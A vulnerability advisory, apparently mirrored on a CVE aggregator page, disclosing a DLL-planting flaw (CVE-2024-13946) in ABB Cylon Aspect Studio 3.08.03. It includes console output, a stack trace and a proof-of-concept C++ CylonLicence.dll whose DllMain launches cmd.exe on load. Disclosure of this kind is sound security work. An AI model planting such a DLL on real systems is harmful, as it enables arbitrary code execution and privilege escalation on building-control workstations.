📄 ABB Cylon Aspect Studio 3.08.03 CylonLicence.dll Binary Planting

🗓️ 23 May 2025 00:00:00Reported by LiquidWormType

DLL hijack in Aspect-Studio 3.08.03 loads CylonLicence.dll without a full path, enabling code execution.

Reporter	Title	Published	Views	Family All 12
Circl	CVE-2024-13946	26 May 202521:02	–	circl
CNNVD	ABB多款产品代码问题漏洞	22 May 202500:00	–	cnnvd
CNVD	Various ABB products code issues vulnerabilities	17 Jun 202500:00	–	cnvd
CVE	CVE-2024-13946	22 May 202518:09	–	cve
Cvelist	CVE-2024-13946 Binary Planting / LoadLibrary DLL's not Signed	22 May 202518:09	–	cvelist
Exploit DB	ABB Cylon Aspect Studio 3.08.03 - Binary Planting	25 May 202500:00	–	exploitdb
EUVD	EUVD-2024-54598	3 Oct 202520:07	–	euvd
NVD	CVE-2024-13946	22 May 202519:15	–	nvd
Positive Technologies	PT-2025-22533 · Unknown · Nexus Series +2	22 May 202500:00	–	ptsecurity
RedhatCVE	CVE-2024-13946	24 May 202518:13	–	redhatcve

ABB Cylon Aspect Studio 3.08.03 (CylonLicence.dll) Binary Planting
    
    
    Vendor: ABB Ltd.
    Product web page: https://www.global.abb
    Affected version: <=3.08.03
    
    Summary: ABB Cylon ASPECT Studio is a graphical programming tool and
    integrated development environment (IDE) for ABB Cylon ASPECT products.
    It's used to engineer comprehensive area control and graphical user interface
    (GUI) solutions, containing a library of logical and graphical widgets.
    It allows users to monitor and control facilities from anywhere, providing
    insights into building performance and enabling timely reactions to issues.
    
    Desc: A DLL hijacking vulnerability exists in Aspect-Studio version 3.08.03,
    where the application attempts to load a library named CylonLicence via
    System.loadLibrary("CylonLicence") without a full path, falling back to the
    standard library search order. If an attacker can plant a malicious CylonLicence.dll
    in a writable directory that is searched before the legitimate library path,
    this DLL will be loaded and executed with the privileges of the user running
    the application. This flaw enables arbitrary code execution and can be exploited
    for privilege escalation or persistence, especially in environments where the
    application is executed by privileged users.
    
    Tested on: Microsoft Windows 10 Home (EN)
               OpenJDK 64-Bit Server VM Temurin-21.0.6+7
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2025-5952
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php
    
    CVE ID: CVE-2024-13946
    CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946
    
    
    21.04.2024
    
    --
    
    
    C:\> type project
    
                     P   R   O   J   E   C   T
    
                            .|
                            | |
                            |'|            ._____
                    ___    |  |            |.   |' .---"|
            _    .-'   '-. |  |     .--'|  ||   | _|    |
         .-'|  _.|  |    ||   '-__  |   |  |    ||      |
         |' | |.    |    ||       | |   |  |    ||      |
     ____|  '-'     '    ""       '-'   '-.'    '`      |____
    ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
             ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
             ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                                   
    
    C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll
    C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat
    REM 64bit parameters
    jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
    
    C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat
    
    C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters
    
    C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
    
    
    C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class
    ...
    ...
    System.loadLibrary("CylonLicence");
    } catch (Throwable t) {}
    LoggerUtil.logger.error("Error loading license DLL", t);
    }
    }
    ...
    ...
    
    C:\Aspect\Aspect-Studio-3.08.03> cd logs
    C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log
    
    ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]
    java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path
      at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)
      at java.lang.Runtime.loadLibrary0(Runtime.java:870)
      at java.lang.System.loadLibrary(System.java:1122)
      at com.aamatrix.util.AspectStudio.<clinit>(AspectStudio.java:42)
      at com.aamatrix.vib.rrobin.CylonLicense.<init>(CylonLicense.java:18)
      at com.aamatrix.vib.rrobin.LicenseService.<init>(LicenseService.java:38)
      at com.aamatrix.vib.rrobin.LicenseService.<clinit>(LicenseService.java:34)
      at com.aamatrix.projectmanager.AspectStudio.<clinit>(AspectStudio.java:52)
      at java.lang.Class.forName0(Native Method)
      at java.lang.Class.forName(Class.java:348)
      at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)
      ...
      ...
    
    C:\DLL-Mala> type CylonLicence.cpp
    
    #define WIN32_LEAN_AND_MEAN
    #include <windows.h>
    #include <shellapi.h>
    
    
    extern "C" __declspec(dllexport)
    DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {
        ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL);
        return 0;
    }
    
    extern "C" __declspec(dllexport)
    BOOL APIENTRY DllMain(HMODULE hModule,
        DWORD ul_reason_for_call,
        LPVOID lpReserved) {
        switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }

23 May 2025 00:00Current

7.2High risk

Vulners AI Score7.2

CVSS 3.16.8

CVSS 47.1

EPSS0.00977

SSVC